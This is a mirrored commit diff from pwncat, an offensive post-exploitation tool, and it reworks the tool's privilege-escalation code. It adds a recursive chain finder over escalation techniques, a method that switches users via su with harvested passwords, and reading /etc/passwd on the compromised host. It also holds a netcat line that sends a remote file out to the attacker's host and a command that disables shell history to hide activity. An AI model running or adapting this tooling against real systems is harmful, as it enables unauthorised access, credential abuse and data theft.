mirror of
https://github.com/calebstewart/pwncat.git
synced 2024-11-27 19:04:15 +01:00
Accounted for wordwrap in remote prompt input, which caused indefinite hangs for long commands
This commit is contained in:
parent
7e1aa8ca28
commit
09a071b6e6
@ -18,4 +18,4 @@ class NetcatDownloader(RawDownloader):
|
||||
nc = self.pty.which("nc")
|
||||
remote_file = shlex.quote(self.remote_path)
|
||||
|
||||
self.pty.run(f"{nc} -q0 {lhost} {lport} < {remote_file}", wait=False)
|
||||
self.pty.run(f"{nc} -q0 {lhost} {lport} < {remote_file}")
|
||||
|
@ -1,36 +1,85 @@
|
||||
#!/usr/bin/env python3
|
||||
from typing import Type, List
|
||||
|
||||
from pwncat.privesc.base import Privesc, PrivescError
|
||||
from pwncat.privesc.setuid import SetuidPrivesc
|
||||
from pwncat.privesc.base import Method, PrivescError, Technique, SuMethod
|
||||
from pwncat.privesc.setuid import SetuidMethod
|
||||
|
||||
all_privescs = [SetuidPrivesc]
|
||||
privescs = [SetuidPrivesc]
|
||||
methods = [SetuidMethod]
|
||||
|
||||
|
||||
def get_names() -> List[str]:
|
||||
""" get the names of all privescs """
|
||||
return [d.NAME for d in all_privescs]
|
||||
class Finder:
|
||||
""" Locate a privesc chain which ends with the given user. If `depth` is
|
||||
supplied, stop searching at `depth` techniques. If `depth` is not supplied
|
||||
or is negative, search until all techniques are exhausted or a chain is
|
||||
found. If `user` is not provided, depth is forced to `1`, and all methods
|
||||
to privesc to that user are returned. """
|
||||
|
||||
def __init__(self, pty: "pwncat.pty.PtyHandler"):
|
||||
""" Create a new privesc finder """
|
||||
|
||||
def find(pty: "pwncat.pty.PtyHandler", hint: str = None) -> Type[Privesc]:
|
||||
""" Locate an applicable privesc """
|
||||
self.pty = pty
|
||||
|
||||
if hint is not None:
|
||||
# Try to return the requested privesc
|
||||
for d in all_privescs:
|
||||
if d.NAME != hint:
|
||||
continue
|
||||
d.check(pty)
|
||||
return d
|
||||
|
||||
raise PrivescError(f"{hint}: no such privesc")
|
||||
|
||||
for d in privescs:
|
||||
self.methods: List[Method] = []
|
||||
for m in [SetuidMethod, SuMethod]:
|
||||
try:
|
||||
d.check(pty)
|
||||
return d
|
||||
m.check(self.pty)
|
||||
self.methods.append(m())
|
||||
except PrivescError:
|
||||
pass
|
||||
|
||||
def escalate(
|
||||
self,
|
||||
target_user: str = None,
|
||||
depth: int = None,
|
||||
chain: List[Technique] = [],
|
||||
starting_user=None,
|
||||
):
|
||||
""" Search for a technique chain which will gain access as the given
|
||||
user. """
|
||||
|
||||
current_user = self.pty.current_user
|
||||
if (
|
||||
target_user == current_user["name"]
|
||||
or current_user["id"] == 0
|
||||
or current_user["name"] == "root"
|
||||
):
|
||||
raise PrivescError(f"you are already {current_user['name']}")
|
||||
|
||||
if starting_user is None:
|
||||
starting_user = current_user
|
||||
|
||||
if len(chain) > depth:
|
||||
raise PrivescError("max depth reached")
|
||||
|
||||
# Enumerate escalation options for this user
|
||||
techniques = []
|
||||
for method in self.methods:
|
||||
techniques.extend(method.enumerate())
|
||||
|
||||
# Escalate directly to the target
|
||||
for tech in techniques:
|
||||
if tech.user == target_user:
|
||||
try:
|
||||
tech.method.execute(tech)
|
||||
chain.append(tech)
|
||||
return chain
|
||||
except PrivescError:
|
||||
pass
|
||||
|
||||
# We can't escalate directly to the target. Instead, try recursively
|
||||
# against other users.
|
||||
for tech in techniques:
|
||||
if tech.user == target_user:
|
||||
continue
|
||||
try:
|
||||
tech.method.execute(tech)
|
||||
chain.append(tech)
|
||||
except PrivescError:
|
||||
continue
|
||||
else:
|
||||
raise PrivescError("no acceptable privescs found")
|
||||
try:
|
||||
return self.escalate(target_user, depth, chain, starting_user)
|
||||
except PrivescError:
|
||||
self.pty.run("exit", wait=False)
|
||||
chain.pop()
|
||||
|
||||
raise PrivescError(f"no route to {target_user} found")
|
||||
|
@ -1,5 +1,6 @@
|
||||
#!/usr/bin/env python3
|
||||
from typing import Generator, Callable
|
||||
from typing import Generator, Callable, List, Any
|
||||
from dataclasses import dataclass
|
||||
import threading
|
||||
import socket
|
||||
import os
|
||||
@ -11,9 +12,24 @@ class PrivescError(Exception):
|
||||
""" An error occurred while attempting a privesc technique """
|
||||
|
||||
|
||||
class Privesc:
|
||||
@dataclass
|
||||
class Technique:
|
||||
# The user that this technique will move to
|
||||
user: str
|
||||
# The method that will be used
|
||||
method: "Method"
|
||||
# The unique identifier for this method (can be anything, specific to the
|
||||
# method)
|
||||
ident: Any
|
||||
|
||||
def __str__(self):
|
||||
return f"{self.user} via {self.method.name}"
|
||||
|
||||
|
||||
class Method:
|
||||
|
||||
# Binaries which are needed on the remote host for this privesc
|
||||
name = "unknown"
|
||||
BINARIES = []
|
||||
|
||||
@classmethod
|
||||
@ -21,13 +37,65 @@ class Privesc:
|
||||
""" Check if the given PTY connection can support this privesc """
|
||||
for binary in cls.BINARIES:
|
||||
if pty.which(binary) is None:
|
||||
raise DownloadError(f"required remote binary not found: {binary}")
|
||||
raise PrivescError(f"required remote binary not found: {binary}")
|
||||
|
||||
def __init__(self, pty: "pwncat.pty.PtyHandler"):
|
||||
self.pty = pty
|
||||
|
||||
def execute(self) -> Generator[str, None, None]:
|
||||
""" Generate the commands needed to send this file back. This is a
|
||||
generator, which yields strings which will be executed on the remote
|
||||
host. """
|
||||
return
|
||||
def enumerate(self) -> List[Technique]:
|
||||
""" Enumerate all possible escalations to the given users """
|
||||
raise NotImplementedError("no enumerate method implemented")
|
||||
|
||||
def execute(self, technique: Technique):
|
||||
""" Execute the given technique to move laterally to the given user.
|
||||
Raise a PrivescError if there was a problem. """
|
||||
raise NotImplementedError("no execute method implemented")
|
||||
|
||||
def __str__(self):
|
||||
return self.name
|
||||
|
||||
|
||||
class SuMethod(Method):
|
||||
|
||||
name = "su"
|
||||
BINARIES = ["su"]
|
||||
|
||||
def enumerate(self) -> List[Technique]:
|
||||
|
||||
result = []
|
||||
current_user = self.pty.whoami()
|
||||
|
||||
for user, info in self.pty.users.items():
|
||||
if user == current_user:
|
||||
continue
|
||||
if info.get("password") is not None:
|
||||
result.append(Technique(user=user, method=self, ident=info["password"]))
|
||||
|
||||
return []
|
||||
|
||||
def execute(self, technique: Technique):
|
||||
|
||||
# Send the su command, and check if it succeeds
|
||||
self.pty.run(f'su {technique.user} -c "echo good"', wait=False)
|
||||
|
||||
# Read the echo
|
||||
if self.pty.has_echo:
|
||||
self.pty.client.recvuntil("\n")
|
||||
|
||||
# Send the password
|
||||
self.pty.client.sendall(technique.ident.encode("utf-8") + b"\n")
|
||||
|
||||
# Read the echo
|
||||
if self.pty.has_echo:
|
||||
self.pty.client.recvuntil("\n")
|
||||
|
||||
# Read the response (either "Authentication failed" or "good")
|
||||
result = self.pty.client.recvuntil("\n")
|
||||
if b"failure" in result.lower() or "good" not in result.lower():
|
||||
raise PrivescError(f"{technique.user}: invalid password")
|
||||
|
||||
self.pty.run(f"su {technique.user}", wait=False)
|
||||
self.pty.client.sendall(technique.ident.encode("utf-8") + b"\n")
|
||||
|
||||
if self.pty.whoami() != technique.user:
|
||||
raise PrivescError(f"{technique} failed (still {self.pty.whoami()})")
|
||||
|
@ -1,5 +1,5 @@
|
||||
#!/usr/bin/env python3
|
||||
from typing import Generator
|
||||
from typing import Generator, List
|
||||
import shlex
|
||||
import sys
|
||||
from time import sleep
|
||||
@ -7,7 +7,7 @@ import os
|
||||
from colorama import Fore, Style
|
||||
|
||||
from pwncat.util import info, success, error, progress, warn
|
||||
from pwncat.privesc.base import Privesc, PrivescError
|
||||
from pwncat.privesc.base import Method, PrivescError, Technique
|
||||
|
||||
# https://gtfobins.github.io/#+suid
|
||||
known_setuid_privescs = {
|
||||
@ -70,11 +70,14 @@ known_setuid_privescs = {
|
||||
}
|
||||
|
||||
|
||||
class SetuidPrivesc(Privesc):
|
||||
class SetuidMethod(Method):
|
||||
|
||||
NAME = "setuid"
|
||||
name = "setuid"
|
||||
BINARIES = ["find"]
|
||||
|
||||
def enumerate(self) -> List[Technique]:
|
||||
""" Find all techniques known at this time """
|
||||
|
||||
def execute(self):
|
||||
""" Look for setuid binaries and attempt to run"""
|
||||
|
||||
|
@ -65,20 +65,18 @@ class RemotePathCompleter(Completer):
|
||||
if path == "":
|
||||
path = "."
|
||||
|
||||
# Ensure the directory exists
|
||||
if self.pty.run(f"test -d {shlex.quote(path)} && echo -n good") != b"good":
|
||||
return
|
||||
delim = self.pty.process(f"ls -1 -a {shlex.quote(path)}", delim=True)
|
||||
|
||||
files = self.pty.run(f"ls -1 -a {shlex.quote(path)}").decode("utf-8").strip()
|
||||
files = files.split()
|
||||
|
||||
for name in files:
|
||||
name = self.pty.recvuntil(b"\n").strip()
|
||||
while name != delim:
|
||||
name = name.decode("utf-8")
|
||||
if name.startswith(partial_name):
|
||||
yield Completion(
|
||||
name,
|
||||
start_position=-len(partial_name),
|
||||
display=[("#ff0000", "(remote)"), ("", f" {name}")],
|
||||
)
|
||||
name = self.pty.recvuntil(b"\n").strip()
|
||||
|
||||
|
||||
class LocalPathCompleter(Completer):
|
||||
@ -188,6 +186,7 @@ class PtyHandler:
|
||||
self.input = b""
|
||||
self.lhost = None
|
||||
self.known_binaries = {}
|
||||
self.known_users = {}
|
||||
self.vars = {"lhost": util.get_ip_addr()}
|
||||
self.remote_prefix = "\\[\\033[01;31m\\](remote)\\033[00m\\]"
|
||||
self.remote_prompt = "\\[\\033[01;32m\\]\\u@\\h\\[\\033[00m\\]:\\[\\033[01;34m\\]\\w\\[\\033[00m\\]\\$"
|
||||
@ -211,7 +210,7 @@ class PtyHandler:
|
||||
# We should always get a response within 3 seconds...
|
||||
self.client.settimeout(1)
|
||||
|
||||
util.info("probing for prompt...", overlay=True)
|
||||
util.info("probing for prompt...", overlay=False)
|
||||
start = time.time()
|
||||
prompt = b""
|
||||
try:
|
||||
@ -223,28 +222,29 @@ class PtyHandler:
|
||||
# We assume if we got data before sending data, there is a prompt
|
||||
if prompt != b"":
|
||||
self.has_prompt = True
|
||||
util.info(f"found a prompt", overlay=True)
|
||||
util.info(f"found a prompt", overlay=False)
|
||||
else:
|
||||
self.has_prompt = False
|
||||
util.info("no prompt observed", overlay=True)
|
||||
util.info("no prompt observed", overlay=False)
|
||||
|
||||
# Send commands without a new line, and see if the characters are echoed
|
||||
util.info("checking for echoing", overlay=True)
|
||||
self.client.send(b"echo")
|
||||
util.info("checking for echoing", overlay=False)
|
||||
test_cmd = b"echo"
|
||||
self.client.send(test_cmd)
|
||||
response = b""
|
||||
|
||||
try:
|
||||
while len(response) < 7:
|
||||
response += self.client.recv(7 - len(response))
|
||||
while len(response) < len(test_cmd):
|
||||
response += self.client.recv(len(test_cmd) - len(response))
|
||||
except socket.timeout:
|
||||
pass
|
||||
|
||||
if response == b"echo":
|
||||
if response == test_cmd:
|
||||
self.has_echo = True
|
||||
util.info("found input echo", overlay=True)
|
||||
util.info("found input echo", overlay=False)
|
||||
else:
|
||||
self.has_echo = False
|
||||
util.info(f"no echo observed", overlay=True)
|
||||
util.info(f"no echo observed", overlay=False)
|
||||
|
||||
self.client.send(b"\n")
|
||||
response = self.client.recv(1)
|
||||
@ -315,6 +315,9 @@ class PtyHandler:
|
||||
# opened)
|
||||
self.run("unset HISTFILE; export HISTCONTROL=ignorespace")
|
||||
|
||||
# Disable automatic margins, which fuck up the prompt
|
||||
self.run("tput rmam")
|
||||
|
||||
# Synchronize the terminals
|
||||
util.info("synchronizing terminal state", overlay=True)
|
||||
self.do_sync([])
|
||||
@ -715,12 +718,12 @@ class PtyHandler:
|
||||
|
||||
if delim:
|
||||
if self.has_echo:
|
||||
self.recvuntil(b"_PWNCAT_ENDDELIM_") # first in command
|
||||
# Recieve line ending from output
|
||||
self.recvuntil(b"\n")
|
||||
self.recvuntil(b"_PWNCAT_STARTDELIM_")
|
||||
self.recvuntil(b"\n", interp=True)
|
||||
|
||||
self.recvuntil(b"_PWNCAT_STARTDELIM_") # first in output
|
||||
self.recvuntil(b"\n")
|
||||
self.recvuntil(b"_PWNCAT_STARTDELIM_", interp=True) # first in output
|
||||
self.recvuntil(b"\n", interp=True)
|
||||
|
||||
return b"_PWNCAT_ENDDELIM_"
|
||||
|
||||
@ -791,8 +794,9 @@ class PtyHandler:
|
||||
self.has_cr = True
|
||||
self.has_echo = True
|
||||
self.run(f'export PS1="{self.remote_prefix} $SAVED_PS1"')
|
||||
self.run(f"tput rmam")
|
||||
|
||||
def recvuntil(self, needle: bytes, flags=0):
|
||||
def recvuntil(self, needle: bytes, flags=0, interp=False):
|
||||
""" Recieve data from the client until the specified string appears """
|
||||
|
||||
if isinstance(needle, str):
|
||||
@ -801,7 +805,15 @@ class PtyHandler:
|
||||
result = b""
|
||||
while not result.endswith(needle):
|
||||
try:
|
||||
result += self.client.recv(1, flags)
|
||||
data = self.client.recv(1, flags)
|
||||
# Bash sends some **WEIRD** shit and wraps it in backspace
|
||||
# characters for some reason. When asked, we interpret the
|
||||
# backspace characters so the response is what we expect.
|
||||
if interp and data == b"\x08":
|
||||
if len(result) > 0:
|
||||
result = result[:-1]
|
||||
else:
|
||||
result += data
|
||||
except socket.timeout:
|
||||
continue # force waiting
|
||||
|
||||
@ -848,3 +860,37 @@ class PtyHandler:
|
||||
self.download_parser.add_argument("path", help="path to the file to download")
|
||||
|
||||
self.back_parser = argparse.ArgumentParser(prog="back")
|
||||
|
||||
def whoami(self):
|
||||
result = self.run("whoami")
|
||||
return result.strip().decode("utf-8")
|
||||
|
||||
@property
|
||||
def users(self):
|
||||
if self.known_users:
|
||||
return self.known_users
|
||||
|
||||
self.known_users = {}
|
||||
|
||||
passwd = self.run("cat /etc/passwd")
|
||||
for line in passwd.split("\n"):
|
||||
line = line.split(":")
|
||||
user_data = {
|
||||
"name": line[0],
|
||||
"password": None,
|
||||
"uid": int(line[2]),
|
||||
"gid": int(line[3]),
|
||||
"description": line[4],
|
||||
"home": line[5],
|
||||
"shell": line[6],
|
||||
}
|
||||
self.known_users[line[0]] = user_data
|
||||
|
||||
return self.known_users
|
||||
|
||||
@property
|
||||
def current_user(self):
|
||||
name = self.whoami()
|
||||
if name in self.users:
|
||||
return self.users[name]
|
||||
return None
|
||||
|
Loading…
Reference in New Issue
Block a user